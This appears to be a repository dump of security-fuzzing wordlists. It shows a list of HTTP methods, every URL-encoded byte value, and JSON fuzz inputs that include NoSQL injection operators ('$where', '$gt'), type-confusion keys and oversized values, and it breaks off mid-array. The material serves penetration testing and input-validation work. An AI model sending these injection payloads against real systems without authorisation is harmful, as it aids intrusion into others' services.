├── HTTP verbs.txt ├── HexValsAllBytes.txt ├── JSON_Fuzzing.txt ├── LFI ├── JHADDIX_LFI.txt ├── common-ms-httpd-log-locations.txt └── common-unix-httpd-log-locations.txt ├── NullByteRepresentations.txt ├── README.md ├── cmdinjection ├── Linux-Command-Echo-Fuzz.txt └── Linux-Command-Graybox-Fuzz.txt ├── fileupload ├── MimeTypes.txt ├── alt-extensions-asp.txt ├── alt-extensions-jsp.txt └── alt-extensions-php.txt ├── format-strings.txt ├── fuzzfull ├── all-attacks-unix.txt ├── all-attacks-win.txt └── all-attacks-xplatform.txt ├── integer-overflows.txt ├── known-uri-types.txt ├── param.txt ├── sqlinjection └── SQLfuzz.txt ├── true.txt ├── unicode ├── corrupted.txt ├── emoji.txt ├── japanese-emoticon.txt ├── naughty-unicode.txt ├── regionalindicators.txt ├── right-to-left.txt ├── specialchars.txt ├── two-byte-chars.txt └── upsidedown.txt ├── weakpassword ├── pass1000.txt └── weak_pass_bt.txt ├── xml-attacks.txt └── xss.txt /HTTP verbs.txt: -------------------------------------------------------------------------------- 1 | GET 2 | POST 3 | HEAD 4 | CONNECT 5 | PUT 6 | TRACE 7 | OPTIONS 8 | DELETE 9 | ACL 10 | ARBITRARY 11 | BASELINE-CONTROL 12 | BCOPY 13 | BDELETE 14 | BIND 15 | BMOVE 16 | BPROPFIND 17 | BPROPPATCH 18 | CHECKIN 19 | CHECKOUT 20 | COPY 21 | DEBUG 22 | INDEX 23 | LABEL 24 | LINK 25 | LOCK 26 | MERGE 27 | MKACTIVITY 28 | MKCALENDAR 29 | MKCOL 30 | MKREDIRECTREF 31 | MKWORKSPACE 32 | MOVE 33 | NOTIFY 34 | ORDERPATCH 35 | PATCH 36 | POLL 37 | PROPFIND 38 | PROPPATCH 39 | REBIND 40 | REPORT 41 | RPC_IN_DATA 42 | RPC_OUT_DATA 43 | SEARCH 44 | SUBSCRIBE 45 | TRACK 46 | UNBIND 47 | UNCHECKOUT 48 | UNLINK 49 | UNLOCK 50 | UNSUBSCRIBE 51 | UPDATE 52 | UPDATEREDIRECTREF 53 | VERSION-CONTROL 54 | X-MS-ENUMATTS -------------------------------------------------------------------------------- /HexValsAllBytes.txt: -------------------------------------------------------------------------------- 1 | %00 2 | %01 3 | %02 4 | %03 5 | %04 6 | %05 7 | %06 8 | %07 9 | %08 10 | %09 11 | %0a 12 | %0b 13 | %0c 14 | %0d 15 | %0e 16 | %0f 17 | %10 18 | %11 19 | %12 20 | %13 21 | %14 22 | %15 23 | %16 24 | %17 25 | %18 26 | %19 27 | %1a 28 | %1b 29 | %1c 30 | %1d 31 | %1e 32 | %1f 33 | %20 34 | %21 35 | %22 36 | %23 37 | %24 38 | %25 39 | %26 40 | %27 41 | %28 42 | %29 43 | %2a 44 | %2b 45 | %2c 46 | %2d 47 | %2e 48 | %2f 49 | %30 50 | %31 51 | %32 52 | %33 53 | %34 54 | %35 55 | %36 56 | %37 57 | %38 58 | %39 59 | %3a 60 | %3b 61 | %3c 62 | %3d 63 | %3e 64 | %3f 65 | %40 66 | %41 67 | %42 68 | %43 69 | %44 70 | %45 71 | %46 72 | %47 73 | %48 74 | %49 75 | %4a 76 | %4b 77 | %4c 78 | %4d 79 | %4e 80 | %4f 81 | %50 82 | %51 83 | %52 84 | %53 85 | %54 86 | %55 87 | %56 88 | %57 89 | %58 90 | %59 91 | %5a 92 | %5b 93 | %5c 94 | %5d 95 | %5e 96 | %5f 97 | %60 98 | %61 99 | %62 100 | %63 101 | %64 102 | %65 103 | %66 104 | %67 105 | %68 106 | %69 107 | %6a 108 | %6b 109 | %6c 110 | %6d 111 | %6e 112 | %6f 113 | %70 114 | %71 115 | %72 116 | %73 117 | %74 118 | %75 119 | %76 120 | %77 121 | %78 122 | %79 123 | %7a 124 | %7b 125 | %7c 126 | %7d 127 | %7e 128 | %7f 129 | %80 130 | %81 131 | %82 132 | %83 133 | %84 134 | %85 135 | %86 136 | %87 137 | %88 138 | %89 139 | %8a 140 | %8b 141 | %8c 142 | %8d 143 | %8e 144 | %8f 145 | %90 146 | %91 147 | %92 148 | %93 149 | %94 150 | %95 151 | %96 152 | %97 153 | %98 154 | %99 155 | %9a 156 | %9b 157 | %9c 158 | %9d 159 | %9e 160 | %9f 161 | %a0 162 | %a1 163 | %a2 164 | %a3 165 | %a4 166 | %a5 167 | %a6 168 | %a7 169 | %a8 170 | %a9 171 | %aa 172 | %ab 173 | %ac 174 | %ad 175 | %ae 176 | %af 177 | %b0 178 | %b1 179 | %b2 180 | %b3 181 | %b4 182 | %b5 183 | %b6 184 | %b7 185 | %b8 186 | %b9 187 | %ba 188 | %bb 189 | %bc 190 | %bd 191 | %be 192 | %bf 193 | %c0 194 | %c1 195 | %c2 196 | %c3 197 | %c4 198 | %c5 199 | %c6 200 | %c7 201 | %c8 202 | %c9 203 | %ca 204 | %cb 205 | %cc 206 | %cd 207 | %ce 208 | %cf 209 | %d0 210 | %d1 211 | %d2 212 | %d3 213 | %d4 214 | %d5 215 | %d6 216 | %d7 217 | %d8 218 | %d9 219 | %da 220 | %db 221 | %dc 222 | %dd 223 | %de 224 | %df 225 | %e0 226 | %e1 227 | %e2 228 | %e3 229 | %e4 230 | %e5 231 | %e6 232 | %e7 233 | %e8 234 | %e9 235 | %ea 236 | %eb 237 | %ec 238 | %ed 239 | %ee 240 | %ef 241 | %f0 242 | %f1 243 | %f2 244 | %f3 245 | %f4 246 | %f5 247 | %f6 248 | %f7 249 | %f8 250 | %f9 251 | %fa 252 | %fb 253 | %fc 254 | %fd 255 | %fe 256 | %ff 257 | -------------------------------------------------------------------------------- /JSON_Fuzzing.txt: -------------------------------------------------------------------------------- 1 | {} 2 | {"1":"0"} 3 | {"1":0} 4 | {"0":"\x00"} 5 | {"0":[]} 6 | {"0":[1]} 7 | {"0":[1,2]} 8 | {"0":["1","2"]} 9 | {"\x00":"0"} 10 | {"\x00":0} 11 | {"\x00":""} 12 | {"\x00":[]} 13 | {"\x00":[1]} 14 | {"\x00":[1,2]} 15 | {"__class":"null","A":"B"} 16 | {"_class":"null","A":"B"} 17 | {"__className":"null","A":"B"} 18 | {"_className":"null","A":"B"} 19 | {"cls":"null","A":"B"} 20 | {"Cls":"null","A":"B"} 21 | {"class":"null","A":"B"} 22 | {"klass":"null","A":"B"} 23 | {"Class":"null","A":"B"} 24 | {"Klass":"null","A":"B"} 25 | {"__kind":"null","A":"B"} 26 | {"_kind":"null","A":"B"} 27 | {"kind":"null","A":"B"} 28 | {"Kind":"null","A":"B"} 29 | {"__constructor":"null"} 30 | {"_constructor":"null"} 31 | {"constructor":"null"} 32 | {"_id":1} 33 | {"_id":"1"} 34 | {"id":1} 35 | {"id":"1"} 36 | {"uid":1} 37 | {"uid":"1"} 38 | {"_uid":1} 39 | {"_uid":"1"} 40 | {"toString":"while(1);"} 41 | {"toJSON":"while(1);"} 42 | {"length":999999999999} 43 | {"Length":999999999999} 44 | {"count":999999999999} 45 | {"Count":999999999999} 46 | {"length":99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999} 47 | {"valueOf":"while(1);"} 48 | {":test":"1"} 49 | {"$where":"1==1"} 50 | {"$where":"1"} 51 | {"$or":"1==1"} 52 | {"$or":"1"} 53 | {"$gt": ""} 54 | [] 55 | [1,2] 56 | ["1",2] 57 | ["1","2"] 58 | ["\x00"] 59 | ["\x00", "\x00"] 60 | [{"1":"0"}] 61 | ["1",{"1":"0"}] 62 | [1,{"1":"0"}] 63 | [{"1":"0"},1] 64 | [":test", "1"] 65 | [":\x00", "1"] 66 | ["1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1"] 67 | [1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1